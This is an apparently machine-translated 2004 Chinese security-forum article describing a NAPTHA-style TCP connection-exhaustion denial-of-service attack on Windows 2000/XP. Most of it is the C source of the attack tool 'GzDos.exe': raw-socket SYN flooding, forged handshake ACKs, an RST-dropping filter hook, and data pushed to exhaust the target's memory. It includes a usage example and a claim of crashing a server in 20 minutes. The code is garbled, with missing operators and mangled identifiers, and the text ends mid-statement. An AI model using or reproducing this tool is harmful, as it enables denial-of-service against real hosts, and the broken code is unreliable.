The new D.O.s (D. O.s for Data Transfer for TCP Connections) is first XFOCUS. http://www.xfocus.net/articles/200408/728.html
Author: liond8email: liond8@126.comqq: 10415468my Website: liond8.126.comdate: 2004.08.12 test platform VC 6.0 windows2000 Server target platform Windows 2000, Windows XP suddenly wants to inspire NAPTHA attack mode, I hope This forged connection is extended to the personal PC and is not limited by this conditional factor in the local area network. I took time to study the things written below, I am not nonsense. Now take it out and everyone Share, it is not very mature, I hope to discuss with you. About NAPTHA has written a NaPTHA in 2000. Why use a local area network, just to be better hidden? There is also a more important factor to avoid your host's packets that have a second handshake from the remote host, prevent the system from emitting the RST package disconnects from the forged connection. In addition, there is no much impact on the Windows system for NAPTHA. How much memory consumes Windows. If the counter is refereated, the data is transferred again. A is an attacker C being attacked: a SYN --------> C A SYN, ACK <---- C a Ack --------> C A Send Data --- -> C a Ack <-------- C A Send Data -----> C a Ack <-------- C ... Test Result: For a general temporary port Effectively valid for 1025 ports, quite effective. Memory continues to rise Finally, the computer can cause a computer because there is no response, and the crash. 20 minutes can drag a web bar server. For the maximum number of 80 ports, the effect is not very obvious, and the 40M memory is consumed to be repeated, leaving a large amount of Fin_Wait_1 status and ESTABLISHED state. For some other ports are quite inconvenient due to environmental finite tests. Convenient friends can tell me your test results. Welcome to discuss. So the problem to be solved below has 2: 1.Hook dropped the RST packet of this machine Refer to Flashsky Boss "Writing NDIS Filter Hook Drive Implement IP Packet Filter" http://www.xfocus.net/Articles/ 200210 / 457.html is just the modification of a line of code. Modify IF (Packet [13] == 0x2 && sendInterFaceIndEx == invalid_pf_if_IF_INDEX) to IF (Packet [13] == 0x4 && SendinterFaceIndex! = InvalID_PF_IF_Index) See the original text. Original text is very detailed. 2. Transmission of forgery data is analyzed by Sniffer, and if you want to believe that this fake connection is also added in the SYN package, add option data, negotiating the size of the packet capable of receiving. Otherwise, even if the other party is established, the other party does not return to accept the data, that is, if you want to consume the other party, you can't. For a general SYN scan, the TCP header length is 20 when NaPTHA requests to connect, and it is not optional data. For example, I am in 2000 is 8 bytes, and my friend's 2000 is 12 bytes. Taking my machine as an example 8 bytes, the TCP header length is 28 bytes. TCP_HEAD.TH_LENRES = 0x70. There is also a place to point out that the value of the TCP header is calculated.
Ushort Checksum (ushort * buffer, int size) {unsigned long cksum = 0; while (size> 1) {cksum = * buffer ; size - = sizeof (ushort);} if (size) {cksum = * (uchar * ) Buffer;} CKSUM = (CKSUM >> 16) (CKSUM & 0xFFFF); CKSUM = (CKSUM >> 16); return (~ cksum);} If there is data in a 20-byte TCP header Behind the department, this and the Windows2000 system are not the same. It has a relationship after analysis and data length. If you say 20-byte IP headers, 20-bytes of TCP headers plus 2 bytes of data. If the calculated checksum with the checksum as TCP but 0x4523 0x4323 is calculated by the system so that: tcpHeader.th_sum = checksum ((USHORT *) szSendBuf, sizeof (psdHeader) sizeof (tcpHeader) dwSize); tcpHeader.th_sum = htons (NTOHS (TCPHEADER.TH_SUM) - (USHORT) DWSIZE); DWSIZE is the length of the data belt. Otherwise, the other party does not receive the forged packet. Then it is not possible to achieve the purpose of consuming the other party's memory. Here is the test code. Considering the effect of this procedure or a certain harm, it is not written in a very convenient test program, and it is necessary to manually snifer option bytes. Then enter the option byte below the command line.
For example: GzDos.exe 192.168.248.128 1025 020405B401010402 1000 65534GzDos.exe
void SendData (DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP, char * pBuf, BOOL Isdata, DWORD dwSize); DWORD WINAPI ListeningFunc (LPVOID lpvoid); void Banner (); void debugip (DWORD dwip ); void communication; socket sock = null; int main (int Argc, char * argv []) {banner (); psend = (char *) malloc (800); Memset (psend, 0x38,799 ); Psend [799] = 0; len = strlen (psend); if (argc <5) {Printf ("Input Error! / N"); returnip = strdup (argv [1]); attackport = ATOI (Argv [2]); char * OPTBUFTEMP = (char *) strDUp (argv [3]); convert (OptBufTemp); if (argc == 5) SleepTime = ATOI (Argv [4]); if (Argc == 6) {Sleeptime = ATOI (Argv [4]); startport = ATOI (Argv [5]);} char hostname [255] = {0}; if (initstart () == false Return -1; IF (OPTBUF! = null) {INT i = 0; struct hostent * lp = null; gethostname (Hostname, 255); lp = gethostbyname (Hostname); while (lp-> h_addr_list [i]! = Null) {handle h = null; dWord dwip = 0; dwip = * (dword *) lp-> h_addr_list [i ]; h = CreateThread (null, null , ListeningFunc, (LPVOID) DWIP, NULL, NULL); if (h == null) {Printf ("CREATE LISTENINGFUNC Thread False! / N"); return -1;} Sleep (500);} threadsynflood (null); Else Return -1; Sleep (5555555);} BOOL INITSTART () {BOOL FLAG; int NTIMEOVER; WSADATA WSADATA;
IF (WsaStartup (MakeWord (2, 2), & WSADATA! = 0) {Printf ("WsaStartup Error! / N"); Return False;} listattackobj = (atobj *) Calloc (1, sizeof (atobj)); ListattackObj -> dwip = inet_addr (attackip); listtackObj-> uattackport [0] = htons (attackport); listtAttackobj-> uattackport [1] = 0; ListattackObj-> Next = null; sock = null; if ((sock = socket) AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {printf ( "Socket Setup Error / n!"); return FALSE;} flag = true; if (setsockopt (sock, IPPROTO_IP, IP_HDRINCL, (char *) & flag, sizeof ( flag)) == SOCKET_ERROR) {printf ( "setsockopt IP_HDRINCL error / n!"); return FALSE;} nTimeOver = 2000; if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, (char *) & nTimeOver, sizeof (nTimeOver)) = = SOCKET_ERROR) // Set the time {Printf ("setsockopt so_sndtimeo error! / N"); return false;} Return true;} DWORD WINAPI THREADSYNFLOOD (LPVOID LP) {Atobj * Patobj = ListAttackObj; SOCKADDR_IN addr_in; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; char szSendBuf [1024] = {0}; int i = 0; while (! PAtObj = NULL) {addr_in.sin_family = AF_INET; addr_in.sin_addr.S_un. S_addr = patobj-> dwip; ipheader.h_verlen = (4 << 4 | sizeof (ipheader) / sizeof (unsigned long); ipHeader.tos = 0; ipHeader.total_len = Htons (ipheader) sizeof (TCPHEADER) Optlen; // IP total length ipHeader.Ident = 1; ipheader.frag_and_flags = 0x0040; ipHeader.ttl =
0x80; ipHeader.proto = IPPROTO_TCP; ipHeader.checksum = 0; ipHeader.destIP = pAtObj-> dwIP; ipHeader.sourceIP = GetHostIP (); tcpHeader.th_ack = 0; tcpHeader.th_lenres = (optlen / 4 5) << 4; tcpheader.th_flag = 2; tcpheader.th_win = htons (0x4470); tcpheader.th_urp = 0; tcpheader.th_seq = HTONL (0x00198288); for (int L = startport; l <65535; l ) {INT K = 0 ; while (pAtObj-> uAttackPort [k] = 0!) {tcpHeader.th_dport = pAtObj-> uAttackPort [k ]; psdHeader.daddr = ipHeader.destIP; psdHeader.mbz = 0; psdHeader.ptcl = IPPROTO_TCP; psdHeader.tcpl = htons (sizeof (tcpHeader)); int sendnum = 0; int optlentemp = optlen; tcpHeader.th_sport = htons (l); tcpHeader.th_sum = 0; psdHeader.saddr = ipHeader.sourceIP; memcpy (szSendBuf , & PsdHeader, sizeof (psdHeader)); memcpy (szSendBuf sizeof (psdHeader), & tcpHeader, sizeof (tcpHeader)); memcpy (szSendBuf sizeof (psdHeader) sizeof (tcpHeader), optbuf, optlentemp); tcpHeader.th_sum = checksum ((USHORT *) szSendBuf, sizeof (psdHeader) sizeof (tcpHeader) optlentemp); tcpHeader.th_sum = htons (ntohs (tcpHeader.th_sum) - (USHORT) optlentemp); memcpy (szSendBuf, & ipHeader, sizeof (ipHeader)) Memcpy (szsendbuf sizeof (ipheader), & tcpheader, sizeof (tcpheader);
memcpy (szSendBuf sizeof (ipHeader) sizeof (tcpHeader), optbuf, optlentemp); int rect = sendto (sock, szSendBuf, sizeof (ipHeader) sizeof (tcpHeader) optlentemp, 0, (struct sockaddr *) & addr_in, sizeof (addR_in)); if (SendNum > 10) {sendnum = 0;} if (Rect == Socket_ERROR) {Printf ("Send Error!:% X / N", WsageTlasterror ()); Return False;} else printf "Send OK% D / N", L);} // endwhile sleep (Sleeptime);} Patobj = Patobj-> next;} return 0;} DWORD gethostip () {dWord DWIP = 0; int i = 0; struct Hostent * lp = null; char hostname [255] = {0}; gethostname (Hostname, 255); lp = gethostByname (HostName); while (lp-> h_addr_list [i]! = null) i ; dwip = * (DWord *) lp-> h_addr_list [- i]; return dwip;} Ushort Checksum (Ushort * Buffer, i Nt size) {unsigned long cksum = 0; while (size> 1) {cksum = * buffer ; size - = sizeof (ushort);} if (size) {cksum = * (uchar *) buffer;} cksum = CKSUM >> 16) (CKSUM & 0xFFF); CKSUM = (CKSUM >> 16); return (~ cksum);} DWORD WINAPI LISTENINGFUNC (LPVOID LPVOID) {socket Rawsock; SockAddr_in addr_in = {0}; IF ((Rawsock = Socket (AF_INET, SOCK_RAW, IPPROTO_IP) == Invalid_Socket) {Printf ("Sniffer Socket Setup Error! / N"); Return False;
} Addr_in.sin_family = afd_inet; addr_in.sin_port = htons (8288); addr_in.sin_addr.s_un.s_addr = (dword) LPVOID; // Bind the native IP and port INT RET = Bind to Rawsock (Rawsock, (Struct SockAddr *) & addr_in, sizeof (addr_in)); if (ret == socket_error) {printf ("bind false / n"); exit (0);} dword lpvbuffer = 1; dword lpcbbytesreturned = 0; wsaiock (Rawsock, Sio_rcvall, & lpvbuffer, SizeOf (LPVBUFFER), NULL, 0, & LPCBBYTESRETURNED, NULL, NULL); While (True) {sockaddr_in from = {0}; int size = sizeof (from); char recvbuf [256] = {0}; // Receive data packet RET = Recvfrom (Rawsock, Recvbuf, SizeOf (RECVBUF), 0, (Struct SockAddr *) & from, & size); if (RET! = Socket_ERROR) {// Analysis Packet Ipheader * LPipHeader; LpipHeader = (ipheader * ) Recvbuf; if (lpipheader-> proto == ipproto_tcp && lpipheader-> sourceip == inet_addr (attckip)) {TCPHEADER * LPTCPHEADER = (TCVBUF SIZEOF (IpHeader); // Judgment is the packet if the remote open port is returned (lptcpheader-> th_flag == 0x12) {if (lptcpheader-> th_ack == htonl (0x00198289)) {// Forged 3rd handshake Senddata (lptcpheader-> th_ack , HTONL (Ntohl (LPTCPHEADER-> TH_SEQ) 1), / lptcpheader-> th_dport, lptcpheader-> th_sport, lpipheader-> dest, lpipheader-> sourceip, null, false, 0); // actively issued a data Senddata ( LPTCPHEADER-> TH_ACK, HTONL (NTOHL (LPTCPHEADER-> TH_SEQ)
1), / LPTCPHEADER-> TH_DPORT, LPTCPHEADER-> TH_SPORT, LPPHEADER-> DESTIP, LPPHEADER-> SOURCEIP, PSEND, TRUE, LEN);}} else {if (lptcpheader-> th_flag == 0x10) // Continue to send data SendData (lpTCPheader-> th_ack, lpTCPheader-> th_seq, / lpTCPheader-> th_dport, lpTCPheader-> th_sport, lpIPheader-> destIP, lpIPheader-> sourceIP, psend, TRUE, len);}}}} // end while} void SendData (DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP, char * pBuf, BOOL Isdata, DWORD dwSize) {SOCKADDR_IN addr_in; IPHEADER ipHeader; tCPHEADER tcpHeader; PSDHEADER psdHeader; char szSendBuf [1024] = { 0}; addr_in.sin_family = afd_inet; addr_in.sin_port = Aport; addr_in.sin_addr.s_un.s_addr = aip; ipHeader.h_verlen = (4 << 4 | sizeof (ipheader) / sizeof (unsigned long); ipHeader.tos = 0; ipHeader.ident = 1; ipHeader.frag_and_flags = 0x0040; ipHeader.ttl = 0x80; ipHeader.proto = IPPROTO_TCP; ipHeader.checksum = 0; ipHeader.destIP = AIP; ipHeader.sourceIP = SIP; tcpHeader. th_dport = APort; tcpHeader.th_ack = ACK; tcpHeader.th_lenres = (sizeof (tcpHeader) / 4 << 4 | 0); tcpHeader.th_seq = SEQ; tcpHeader.th_win = htons (0x4470); tcpHeader.th_sport = SPort; ipHeader .total_len = htons (sizeof (ipheader) dwsize; if (! isdata) {tcpHeader.th_flag = 0x10;
} // ack else {tcpHeader.th_flag = 0x18;} tcpHeader.th_urp = 0; psdHeader.daddr = ipHeader.destIP; psdHeader.mbz = 0; psdHeader.ptcl = IPPROTO_TCP; psdHeader.tcpl = htons (sizeof (tcpHeader)) ; tcpHeader.th_sum = 0; psdHeader.saddr = ipHeader.sourceIP; memcpy (szSendBuf, & psdHeader, sizeof (psdHeader)); memcpy (szSendBuf sizeof (psdHeader), & tcpHeader, sizeof (tcpHeader));! if (pBuf = NULL ) {memcpy (szSendBuf sizeof (psdHeader) sizeof (tcpHeader), pBuf, dwSize); tcpHeader.th_sum = checksum ((USHORT *) szSendBuf, sizeof (psdHeader) sizeof (tcpHeader) dwSize); tcpHeader.th_sum = htons (ntohs (tcpHeader.th_sum) - (USHORT) dwSize);} else {tcpHeader.th_sum = checksum ((USHORT *) szSendBuf, sizeof (psdHeader) sizeof (tcpHeader));} memcpy (szSendBuf, & ipHeader, sizeof ( ipHeader); Memcpy (szsendbuf sizeof (ipheader), & tcpheader, sizeof (tcpheader)); int REC = 0; if (PBUF == null) Rect = Sendto (Sock, SzsendBuf, Sizeof (IpHeader) sizeof (tcpHeader), 0, (struct sockaddr *) & addr_in, sizeof (addr_in)); else {memcpy (szSendBuf sizeof (ipHeader) sizeof (tcpHeader), pBuf, dwSize); rect = sendto (sock , SzsendBuf, SizeOf (Ipheter) SizeOf (TCPHEADER) DWSIZE, 0, (Struct Sockaddr *) & addr_in, sizeof (addr_in));}} (Rect == Socket_ERROR) {Printf ("Send Error!:% x / n ", Wsagetlasterror ()); return;} else {if (PBUF! = Null) Printf (" SendData OK% D / N ", NTOHS (Sport); Else Printf ("
